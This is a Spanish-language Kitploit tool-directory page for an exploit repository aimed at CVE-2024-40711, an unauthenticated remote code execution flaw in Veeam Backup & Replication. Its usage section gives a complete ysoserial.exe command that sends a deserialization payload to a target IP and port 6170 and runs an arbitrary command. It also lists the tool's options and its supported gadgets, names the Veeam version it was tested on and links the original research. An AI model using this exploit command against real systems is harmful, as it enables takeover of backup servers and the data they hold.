Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-40711-Exp — CVE-2024-40711-exp | Kitploit
Herramientas/GitHubGitHub/realstatus/cve-2024-40711-exp
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubrealstatus/cve-2024-40711-exp

CVE-2024-40711-Exp

CVE-2024-40711-exp

Ver Repositorio
426hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Usos

root@kitploit:~
.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"
root@kitploit:~
Usage: ysoserial.exe [options]                                                                                                        
Options:                                                                                                                              
      --vi, --targetveeamip=VALUE                                                                                                     
                             La dirección IP objetivo de Veeam Backup and Replication                                                  
      --vp, --targetveeamport=VALUE                                                                                                   
                             El puerto objetivo de Veeam Backup and Replication                                                        
                               (default: 6170)                                                                                        
      --vc, --veeamexpcmd=VALUE                                                                                                       
                             Los comandos que se ejecutarán en el objetivo de Veeam Backup and Replication                            
      --vg, --veeamgadget=VALUE                                                                                                       
                             El gadget que se usará en el objetivo de Veeam Backup and Replication                                     
                               (default: DataSet)                                                                                     
           

cve-2024-4711

Otro gadget

root@kitploit:~
Supported gadgets are: ActivitySurrogateDisableTypeCheck , ActivitySurrogateSelector , ActivitySurrogateSelectorFromFile , AxHostState , BaseActivationFactory , ClaimsIdentity , ClaimsPrincipal , DataSet , DataSetOldBehaviour , DataSetOldBehaviourFromFile , DataSetTypeSpoof , Generic , GenericPrincipal , GetterCompilerResults , GetterSecurityException , GetterSettingsPropertyValue , ObjectDataProvider , ObjRef , PSObject , ResourceSet , RolePrincipal , SessionSecurityToken , SessionViewStateHistoryItem , TextFormattingRunProperties , ToolboxItemContainer , TypeConfuseDelegate , TypeConfuseDelegateMono , Veeam , WindowsClaimsIdentity , WindowsIdentity , WindowsPrincipal , XamlAssemblyLoadFromFile , XamlImageInfo

Pero debes usar Gadget para soportar SOAPFORMATTER

Entorno de prueba

Veeam Backup 12.1.1.56

Referencia

watchtowrlabs/CVE-2024-40711: Exploit sin autenticación para CVE-2024-40711 (github.com)

Veeam Backup & Response - RCE con autenticación, pero principalmente sin autenticación (CVE-2024-40711) (watchtowr.com)

Descargar herramienta